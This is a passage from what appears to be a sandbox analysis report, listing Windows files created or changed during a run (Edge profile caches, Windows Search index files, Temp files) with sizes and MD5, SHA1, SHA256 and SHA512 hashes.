a774451875d808c7bdf393b4c6c6ca84ba795d5560c12bbfd8de0d8fff0ec2f1

SHA512
1b515ee6c69e21493dbd7b87837f6c571a255aa7f10f374dc5076f4232ada009d4ef89531621de42b284c7dd92ed5a3312ab300f2586064dcad286d25dfd9190

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\4cb013792b196a35_1

Filesize
175KB

MD5
74a1a5ba63609614ab21e3713bcfc6d1

SHA1
ed820ed7a81356ebe08e5f8544420c0270305184

SHA256
a43726e010f88320cdc966e81040eff1d6fc9176a3ec57b7926416274d1263a8

SHA512
3a3d878337709aab5c57745dd0321e6bd2a9573a88e3e43b7328864264aa865a3ce659e725b7f2a211623fe680081652dde419fdd7b32d642ef5f3049877f7be

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
96B

MD5
c8745acc4b1044a6ebfa61c705e172c4

SHA1
f1e2e0ae7a2e82b06fb9107795362acc7e4f777c

SHA256
63e40c2bf9e99112105aec940044e54c34b038e4bf44da4d738cf700156843b4

SHA512
42e618504307603953c4262d8cee8f81e234b657b5638660a39af1ce7a58c1d4e9716336f11d5b9c822beebe4fd32edf53b38350cb9cc21bfa3a0056fe8a59e6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
96B

MD5
a171c62d6cb22c8f57a0ae40f1f0c42b

SHA1
f0c1b949f53f5be49c7742be290ba168337d66a5

SHA256
63e771006096ba886644b84a9b72ce197a14e5fd65b4f462a25dfa265aefd5b2

SHA512
8f2cad761ad94ece6b9ec189330a49ef7d3f4a107dacfdf2ca78556cb9df61899500ed3f88138606ae26ce2e8d640bd0128ca31a0d507aef47813d71720341ec

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
168B

MD5
fbe2369fce60e362820b5d13c28d4819

SHA1
22de7a5fd4adadd05742d66d1161d16e871dcf44

SHA256
693acb3933058658124c3a260c420699d7f35da90369d197c6e223f098dffd52

SHA512
58f9ddac98d77cc3988ce0ac9289cc810cb9da66f78090693c5c5fd47d9c3c9507c016b6d0a71dd01d36a131289af2099a809f7e9deaca5e689e40d6569da08e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe59c1cf.TMP

Filesize
48B

MD5
b204ee027a77ed4875e016d373293116

SHA1
f4acce7c27fca3289abe8a83483eb68a8db5a7a5

SHA256
8273c600e7541653608d0158be356a9207378f95441e7e51e2ed5d0c08b00169

SHA512
50412867aa9b81f0936747b893705bfa4a8917d2962c79aafef9d403ca5f9402967b2eebe4c71b912e8ba8a089b125cebc3758074f774fef6e97d6926ea2e7d7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
5ae85ae88bacfd1a3c31f417a84166d4

SHA1
f4c9f139cceb3b6856fef8debc3cd3cce15215bf

SHA256
e353a8ed469ed21b0065d2e2cdb8553821d3f79a0c9c03c3a5d89431e433f2a7

SHA512
05a9632100159c85c0a25ad5d1adabfaf2915c1cdb7af74f6e9630b96ce0bd2ed4e87be0ed375d263d8bc638f1925980974a29411f7e87b43c08a3251433307a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
80bc7a285558d5fe2df4f5fab0509ba0

SHA1
40a30074cb2ee19ba56fab77e0d520a1f0bcd4fa

SHA256
51795b4792d0abec2c0ef369744a11d854b7b299074113608e90b44f13c46117

SHA512
8df5700e57406e8edc8b124ced118c3e11bec4fd6d405e19886fd801c95116b2150d0e30a37238eb8dd23e85683fe239884ef4c0bd01a186520c26b418409a89

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
4KB

MD5
e9656ff22a4ede4b37709d915c40383e

SHA1
7d98330e208e0622fe36471b8d8ea40eb026ecb1

SHA256
b2f543beec8f8bd31bb68930dad51c84adb8856794a386c75ba394a139fb6ee5

SHA512
f55b2eb12c8e517ee8598d8983717f5326803cfc25a0f96749d747d067572127bbb155fc2184c4ec91d4378d2b09592b787d35d3aa257ae6525cfa2767924c0b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
4KB

MD5
10aa3fc33d87df33539ece7461d5e610

SHA1
d1b1db59cdeaf7e8093bd91bf6b5941966a47e11

SHA256
320ce5b0a0b7e0cc9bb87bd7af7572be6e0cb139e7237f0e9d2df87aa84d8d79

SHA512
9824d2d3199ffe2a5e8045eb3b06fb839b7a92899748208aa3d4a2e1f494cac90d425c507da2f4bc71354c9cbd82d4920282d76d79af83d72d952b568a399dd1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
6KB

MD5
7349f772056b78c2550fcca5f3c0f5b5

SHA1
f233abbf37ef3360e40c0978580c0bc6421131f6

SHA256
f261a2e3c54f30d7383f6db0e0e1e07829ec177604e378e333147ea8c155c990

SHA512
16bb72f23f3f6ae43bbf8f7021382da07e886db88208c6517b24745d5368b6cb049686a97749f00573bf24d3d26025879b5e3110f665cb7a451c7127afd4673d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
4KB

MD5
482aa0452d1e6a0a6d582dcfc5dcc3ac

SHA1
42dfe115ca864d8885b6029778e2ebf1055e5d53

SHA256
463826db094df271d6888aed77a8f4ed5eea14b173d8da20209d7a268b463233

SHA512
4052e68b7710ccf9e1570d830fd8803a2a7f8809526edcf33190b6aea4f1de30c7f57fec17d54fca4cc0823a9f26a0609a22314eb71e1081a31165a25a6d0ffc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
ed7053fb0ca26c14f34bbc63e11ad39c

SHA1
786c20e6818cea60926d6e738a1d4d864f845040

SHA256
ed2d72d4016672f55be7a5140b7a19ecd6e4d3e31c7ba21e9ac620a49f0ac956

SHA512
6ea8d39617e8ec29a7a0a4998f685f5d7d0a53d6bdc8c090df0a7843c1bb1b7242e2e8ddb8e3d1ff284530b392d250890364faa3b82492fefc9e09e86429b7f5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
5ad58a72e2e091b101ba0e77c4670334

SHA1
4d7700e04e340dd0079f5ee40987f8da0b7a8f9b

SHA256
6759cf3656ae167376d5f60bbabceb23f1f38ad9da1b305148daaf3129666685

SHA512
fa60220baa063e82791b86d7edeff32c7d7f42e2d6c2d3b3752665ab8e4386c50f1c83c5b9dda5cb2f97beeb80e441658033215cf53ed4a17f71dad9a972fb7e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
e317d12fc465f783822e81ee584d2c24

SHA1
63b36b4a58a7276c81a93bd2f28311c5fe3fadae

SHA256
b4ffb0cf69831ed572c2cbf223e3e0140ca3602d083903321e9ba6cefff67286

SHA512
9107c9c20db561c5704a6edaa286c75c1231a2a4968f563a3f9b2124253b2ec4e4c9320289b6a26ceaa1ac8a8baea8b20303a06e4e3d8cc385e58905dd01d026

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
46746726f1818b8a0448109187d895d7

SHA1
3891e0a0667990358c12e2e6b90d55bcc00964c4

SHA256
3040c38c596ab77c68c23f80131de96c25f3c799833ed9a69f6b2f6c66675baa

SHA512
af0879e88237069f1b4d03cc0ed753affa993ebac5e78ca5838c2cc2e2409017c030d44e6502df7ab73cb85110d7166afe66aaaf48f11b0b7d839fffa0cd8881

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
a18617d45564eebe9789d9209d06c17a

SHA1
733d300efd530f220bc8223ac142ab556a452c06

SHA256
ec842a7108fa2391d050f14638827a06519277e48fd409ca4740b80415244aca

SHA512
88474e942e121afe9ac19fc17b2fd7d1f4408d1d7d58a6579cf63c2197ca979ea2ce53c041e3f993ae219beefd143c6c6249e4ffe92ad653467daa3cb561881d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
4KB

MD5
6a14139ab825723ed26f9e50a453d071

SHA1
52710e4ef6c7772ee132291bf3bba03c4b59af7d

SHA256
1ee892156c29a1ea3893e97497d7ea19d735db0dff0447d798a31cac4bf7454c

SHA512
891ffed9de09d48c236dfc5d7f5ec04713428dc8758ca926a76476fe51c5e578f66966ff9b0910d674aa8189de53022a513beb0876f0363c8d29c1dfd033450e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
4KB

MD5
c0886c766685c6bd0de3b7f936e16b14

SHA1
0f593773c2221f9b6e77907d09a1491386d3ffa0

SHA256
4ee8ad7587f42b7ae41838d5097673a80e9ecd71b3d9fb1fcebd0d67bd42edc7

SHA512
3d72874fe2b4f3c32787695427038e5c8239066c0104b343a20f46c2e045bfdc488a9c2c60bebc78723524092c1c70b9bcf122701206e637c5b147f3cd2ffaa9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
db87538d44261d9b11b1fdf47a8796ca

SHA1
ac3c7ce0c48c774b2b130cb09300dbe3d3aaf9a5

SHA256
3fc0614b18ada7a8e609bc45c282e70972d4fb83d3edf7bc0a7d2c46f677274f

SHA512
d9fcfea378e4b1018fbf5e40e91f084b0921bf8c04c860b1b4edbbbcc8016b14dbaf6363d0103494924c263530a126407c8a5af047cdf24915342d1a332e2983

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
4KB

MD5
11e1e8a1d74ad8fbb9ee4991a9daea1a

SHA1
4610be0514dd85f1866e0a8b7d9c059ff88bb530

SHA256
ec4093e9a20d91f457d02069bf3053395a7f5e16f13807f8ade7f400704a1359

SHA512
cf3c6929657b453b76d96f0a326c5324868c8a19b5512fa63913f4574e8cb89e97a28226b434529e46813fce1598c642fa75c6dbd778a8944978cb20836d0f78

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
1d78b7c3975521d26aff297c334536ca

SHA1
d7fbe7da352e175405e9999847524021b23e4227

SHA256
39941c9dcc1c57c972341be7382408d696fea107d9ef34e1a60a0d65695575b0

SHA512
c0ba25b7447257195ad87fb82daa03d661a882699befbd8d01ceffba25c3abbe3a102abe294c54a649e30adacd7506675c35f97dc01272291169112788be7c2e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
5KB

MD5
ff74750d92ced6c34494fe57a42a30ca

SHA1
c0f480147f7fba97343078afaf6abbb49bbee9cf

SHA256
dc02f76cd9e4d88e07fb25484fa6f83e3e50bbab67ba773e481d3166103e59b3

SHA512
b07718eda9de35343a23e8d895e789b0cc4fadb12098107fe9526e1dbd02fca877ef2e1685ba950896201a0c15ea9f535cdb6cb2b0007117e250a72047a5a2d4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
73eb3686f310f5cb9c69e3392db63246

SHA1
68e31cbfd8ce83aeecaf0a6868c94837280f006c

SHA256
d3cb62465149750e51a5ede8bdaecf5966afd74f79c6518cb9d1ed8f15eff973

SHA512
11bfe0717560bcc9312d41d304bb130d3f8bcc197c4f5380137f54221762af6a53430aedcae993c6ca7eb2fa01ba30731e8e8500c8f04dab079ec1f0e39c2877

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
3KB

MD5
80b38b827c81409315952aafc3f98b6e

SHA1
c8022e2d4ea209f92fd7040dce88086bb28a4ddd

SHA256
c58936cd00933dd70c3744e7f13587b76af5ae265fd4bf3ceb67350d7bc811bf

SHA512
18e0c12b2a5ddcd02ce0f8f0cbe875fc5758a40d93cb792d968fabd4721389b0d499105362742c939dc2aa94cb5638049a2af48500b1f4d65306fcaf3ae1e983

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
b39bbb05839fde36c691302367790fc7

SHA1
18083e1321bc54996e03fe5b8c4d8fe5a9584a87

SHA256
71d23fa2fde5fbe316ab336c8e4c3691b1cc059c5752b487ecb0ff6a93c69cc6

SHA512
7bc47d29e47fd7db6258a9fe6e1d7edfe371b07e03e97a6999afa77f615fa674146ff53d12e5790cd4c868111b6868cc618a9d75a5f35a092cbaae081826f315

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
6KB

MD5
328d62ad12aeb4adbc2cf97be6e76bb9

SHA1
ea479fe9576a40f9594dcc9b24b14049719a9724

SHA256
66c0eedfca1d835640897edef18fc96e73d789e965d966f9188a8024b856ab6b

SHA512
094cc6d2949cc0c9ef49dc3324c70df8462eb54e3a8c3e6474ee8ccf3e411c7ca4b9a731219d7bf669e3b5a06130880a42f8d8dfc6cb3f72cb17fcfed2050dbe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
bd3453e474aa5b31ab3f4d596a44267b

SHA1
1d05aecc7eac7881813c58da57348aaf6b600e8e

SHA256
74e05802ae748ba4bbde9d5cd47828a6f4eb56df3d5caf6adcf2c5df9c0815d5

SHA512
ea3067c49db76e844793aefeeba248e8882834b55319b788154ac9e43095b9ab621a2b87fa0944ec376208e64e6db42081f24650fe0f7df85faf39d9352ca313

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
3KB

MD5
f251906df4aa91687165f735e54425aa

SHA1
4b963372042bb55e31b338db7a0c58fc6f75f6c4

SHA256
2e5506f69ba79ebdf325ba8c929f2ed16cd162b25d74754193051253b6871778

SHA512
eb5ee96c0d1af3d6c001244310af2e7333db6e52e579d8cf22403bd4f3c26096bf7e93e9128b58f795ed869377e31c43f96aaf10e8c17d691d22cff77d8d30a5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe57f0b9.TMP

Filesize
1KB

MD5
11d688bd3b8b1c671d0e9efb47ef3885

SHA1
e08c81dca1f59bf856bf621ce42c83d073095777

SHA256
cfed7e58af319bbae23c51ec23c92928c7d067818c2ab98fc817cabca736accc

SHA512
6a0c34a8d9c97eda7505a0a33cb9d1ecfc4ee85d6f42eb586e6873c9823bb08b00800763bc2ca90637cbde4e01d6fbd630ce5398fcf3576580c76e4696bc88e3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\c7dfc598-e6b2-4edd-ba1e-edc40410b22c.tmp

Filesize
9KB

MD5
c24eb9b09f027256923df697c4a3cf92

SHA1
5b25a20e15c348704dcf4be391c20b11ff79dbeb

SHA256
62bbc979ed31161a2ee30390f73a2596fc1d617e03c230639e008de12f8479d4

SHA512
c2146364a1678cb592763b354abf320aa54dce42c9c6708b148270464b4ef7c702f8026521d14348c1a80c0fc4b4f2a60a9ced1360862ffc95d0d65303b53da5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\e9f1b18d-a6c4-4a4c-8f55-76953f933fc7.tmp

Filesize
1KB

MD5
de87f3d6576b56fd429f8c29771f373a

SHA1
d39a77003a454682da275750c8ffb4726662cb3a

SHA256
2a3f99cea3528e5dd6b61117418a348150d81a0b9c2e3e75f65e79f56c0c97ef

SHA512
578f3503c66853dee73efdb6d39c4a11505367e2bcf778d40ba6eca7e1d460e72149978f7a02122052d6a76d7d07582c08d16304687dd35df36ccdd1877c0cfb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\f_00000c

Filesize
17KB

MD5
087b26dafaaaa077d3495a275f16b496

SHA1
d808255ca7ae7232a1b08728b80a4fa1c3672c1f

SHA256
2d339ca6640f5f6cf4c626616618bc8a7b157c26fbf2831140463860ad896a05

SHA512
fffc11aacbc375b8e60d283480c831ca869fbab92c60a35c765de05fad11decf8228c7ad079b57ec21031310b30b6febb3bfb0b707f4d40f4842abe7247b7a2c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\f_00000d

Filesize
17KB

MD5
f71822e478ad6d45426b25e554658403

SHA1
25ef26ad5f7dd6dab2a6dd6eac4f3c3bf22ec385

SHA256
2b886cd885b78e2aa3c534fae8b7f74ae0ebc4cd86358ef43cb21f5447c27508

SHA512
6f75484b92667d14473f12bda1a88fa1773ce24eb12cccac78119eb7ccb1a5211eadabe262b5eae04b8404b88e5e7e1fd4ee75924981f003572f8dbde06e912e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
e8c4919f7bcd174d7ce51ea7425be03f

SHA1
8d4f7fe71e509f0ac922665eb3b2d97d3bf916f2

SHA256
4f662fb1184236e49eca228b8969316986b860044f2bc77265ac2c906a67d357

SHA512
f9931e985253851bc2f0f16c31ae508204f7d24e6952e20441f9600c25914c9ce45ef321dd5ab70cf9670dc95de02d1f8a59ec382c410f6c5a23839e3116f32a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
6244e4a62b418d43c0837ed0d03a918e

SHA1
0aa0f124b52ea9402a807f86a72f1b1e403b348a

SHA256
23924e15e7d0311a05147aa6e52e60caa315be05e1b03417083253aa66d3c006

SHA512
8a2e438137afa0153bded65c4f90f6b7eac14e929933538654e69d3be7ae112fc21b67d0be3fcb1ed045342b80970c5cea132de0ae05af1322c5c663a4fd70ae

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
56a33f8d2f0bdfb88c1ae2d528d2eee4

SHA1
8c4060e0fa741b9557cef65b9136d92ec7096243

SHA256
0d238e65b2816dc0c46c9c3c4b973ef25df18d80018bc2f24d099f339dcd3679

SHA512
4a297d0430811d4f23ae3db510d02decc1b7a0c837682a710cfcbbc8e9c7a41cab6bda3e33213894cbe18bfc78c09793c6756fe5ac365bccbd9eb7401f35b0b6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
3eed9ce754ecde01814741708ca6bbaf

SHA1
0251a9c579a4fd9c8eb3ddcf57193c4698041faf

SHA256
acd253530e50863f212832011cfbccd1f3583a829696a3cba153d21789387fdd

SHA512
88828a6140d53036c64a3738ef784023efa14d8861e6b0a0a31532a7325fd9eed4b2994dca01d3991f8a7ee138167f61e9a53e5e0a443d948fa0e44ffd4feea5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
21838602514bea785533bed3668aab10

SHA1
54930f46b63bc8cc8e5e1a2f80695c01bd3bcfd8

SHA256
fa4b6871c8b7229b241b27ad1cc221519cfddb6cedcef9141d76bcc7a6b7f073

SHA512
5b23313e3638919f1714f7b6ad939429470beb32fdeb8a5076dee84a728aa9a87ea39306389386481e0ce4a646d59fd115a856d8228d591ac9e606d86a68c378

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
b12955ad340f0d6f322eaa8cc6fc986e

SHA1
14ba4403141c57df4c0b3c5f7ba4ce8f47d0799b

SHA256
2358e7ac2594a7388e5028ad76db33c00baa206f49b2033a079f1da2690fdaf5

SHA512
2446ea296b0e1aa76d3097ae1a7a41bdaa5191c7d608a609f7b84a4343b43c846531743a0d5eb64e7c6b5b770c933a75f59f841a4cedba66298f814b84b50ef0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
0792380a34c8e3a0b228cdac6254db70

SHA1
764a800e22b767b0a95d74da93553e88cd2af1f6

SHA256
e3c8289f408eef3d82d362ed31edbd722f3aff12864cd015959f842e72ad6e73

SHA512
f5c5eee552a736787852f1ad2e7345b47956ab5a56889a33c9bb6702d48f25e07f0634052640a7d21daa76565cce78dfd03ea8fe2a417970faab1b8c5f32074f

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\677KTD6Z\microsoft.windows[1].xml

Filesize
97B

MD5
aade9dcc162c920fb6a9583c0721eddb

SHA1
aeb034bad9aefe41da007060ab46d3da0887d74b

SHA256
1307ee5570ea69120c2692a26459549cfc3e2a50999dd387150da2880f581db4

SHA512
743cc6c871cd490ac57538710defffb2e03ab1634f0ad7191a2938fc7f3586474d75465fece091a1f0d934688420603a7f6ef0382b47cd91f7b4007e9ca63dfa

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_services_msc

Filesize
36KB

MD5
5e2da008f38c7ad813d9fe8e669dddd6

SHA1
3f4ed852167cfb251cce13be4906a0cbea58f021

SHA256
0cf904a532ac487f6b4c080fd01406529ad26ae559128b0aff170f389c278c28

SHA512
8d295af13fa38384923e0db043ef7196ae3cdddc9dc1e765217494461c6c6f24704eb984985c45159cae06e81ca857c4f406b1ec80bc9c8fbccad535a1f77d72

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{04c99aa6-49aa-42d0-9ed2-e256d67cb4aa}\Apps.ft

Filesize
38KB

MD5
ce33e7e545f1d62e8e699a27f561097f

SHA1
50e40fb866f52707bcebe1459e8d99b498a2b04a

SHA256
eb20b66d3be3bcbeae74c03a6382bd2705e94c3beadfdaad355d074e14b4202b

SHA512
2da852b2abe51b19cd18597c0846be146944715c7717d88fdb605529a280984ae88278517085f82009cd440e90962dc1d99efd6222cba0d34f115061eed8aaa9

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{3c1692f8-9e53-4c08-a513-449e28be7420}\0.0.filtertrie.intermediate.txt

Filesize
28KB

MD5
33307380470fdf2820b1c1f7cac365f8

SHA1
122394dc0307b9eb6b073f9632333795c794f663

SHA256
02bf5187718f0c2e3b249324666dea313c0c2e0da55daa410c732c65d42f205c

SHA512
c902c6730e78222c004218af54a3ea8fef06106021bc4a60a161e4bbfce6734aac403c3e5e8629737afe08953aee3d88f046a36e7a6e1384e30931e1b9e537da

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{3c1692f8-9e53-4c08-a513-449e28be7420}\0.1.filtertrie.intermediate.txt

Filesize
5B

MD5
34bd1dfb9f72cf4f86e6df6da0a9e49a

SHA1
5f96d66f33c81c0b10df2128d3860e3cb7e89563

SHA256
8e1e6a3d56796a245d0c7b0849548932fee803bbdb03f6e289495830e017f14c

SHA512
e3787de7c4bc70ca62234d9a4cdc6bd665bffa66debe3851ee3e8e49e7498b9f1cbc01294bf5e9f75de13fb78d05879e82fa4b89ee45623fe5bf7ac7e48eda96

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{3c1692f8-9e53-4c08-a513-449e28be7420}\0.2.filtertrie.intermediate.txt

Filesize
5B

MD5
c204e9faaf8565ad333828beff2d786e

SHA1
7d23864f5e2a12c1a5f93b555d2d3e7c8f78eec1

SHA256
d65b6a3bf11a27a1ced1f7e98082246e40cf01289fd47fe4a5ed46c221f2f73f

SHA512
e72f4f79a4ae2e5e40a41b322bc0408a6dec282f90e01e0a8aaedf9fb9d6f04a60f45a844595727539c1643328e9c1b989b90785271cc30a6550bbda6b1909f8

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{3c1692f8-9e53-4c08-a513-449e28be7420}\Apps.index

Filesize
1.0MB

MD5
13ac60867bde96dbc4292831d50c5d9a

SHA1
3e1e2dc24d94d999687d3f06c62983d29fc0358f

SHA256
4b3ed5183c9b3bc375f757ccfa57787db23715b08569b1e55131084221f99b64

SHA512
229a633fe4efe049ccc7d962bb6f4691f1b96da04313ef98eabe9bcb798f5357d974309d12acda5adad2f3cd08af4173bed3be10cd1c4543ff04ef496a0eaed3

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133658530055920259.txt

Filesize
77KB

MD5
6d853cce4ca0082ebf7eee6c78c17c31

SHA1
4a54131ff0de28e04263a28b231b0e6c12d6b5b9

SHA256
2382f5aba08ea0ab135f75dd45df3e35e511254776a2cf5c471ed01f34ccf730

SHA512
bda53647c54cd64c6922af8c1c59100d49542e747d593ff03abfb718fe1a160e6871e752fe8e5f3261dc3d90d9134958500f3ad7a5ff3b8798b2b3ea3f573fc1

Download Submit
C:\Users\Admin\AppData\Local\Temp\HitmanPro_x64.exe

Filesize
13.6MB

MD5
10dc710dd495e9078ce79b26e18591e0

SHA1
aef434d6b77158dd2accd746bbc727bbc3367adc

SHA256
be5389a28e952d7ab2d9447c1bdb8eb7d11b24cb02e4b18da367715c2acfdd15

SHA512
959c5cb47b9d1c21ddfe2eaac14e0c99c758aab85036705c072525e70255957abc97412ab0ceadd2adbebc1b176699614f71bf50689cf9ff97891e6216a15dc5

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_enhnsuek.z0n.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp2CCF.tmp

Filesize
48KB

MD5
349e6eb110e34a08924d92f6b334801d

SHA1
bdfb289daff51890cc71697b6322aa4b35ec9169

SHA256
c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a

SHA512
2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp2D20.tmp

Filesize
116KB

MD5
9d4112184b2c80ebd619cbea92225753

SHA1
573f831918010408df6c1c399032cfd668a48fd7

SHA256
c842cf1c44bd89585046bfe1721d947922f9341b17ae3177d4aa394d01f58c96

SHA512
7c4cc2cae3119f5453cdccd6384d462689ea309ec8b3d24190a947ffb178d2a787ea10742536a8aa0dcb5d121e28bdab362f7f3f7a920a86c82093199d11da38

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

Filesize
10KB

MD5
e616eb7d49c80e1b98bdfaaba7bbe9a3

SHA1
d313824cbce360ad811e47a90477655cb08f575e

SHA256
9744daaf967f47bbaa28bc5d75971d7e673045bf566313776ff3717e701625ef

SHA512
2d77be643a92017b8f5709ab80bc3d16796f5e77d95191e21321169d976277f4b724a4354e77f214acaa2bb9714f36b57dc0c9296aa9442e96c7141e8a9d1f3a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

Filesize
10KB

MD5
9ffafb645b99c56d057efefa4266939d

SHA1
48f79c07d9d9919b88ad6377f57f39065e2fec9e

SHA256
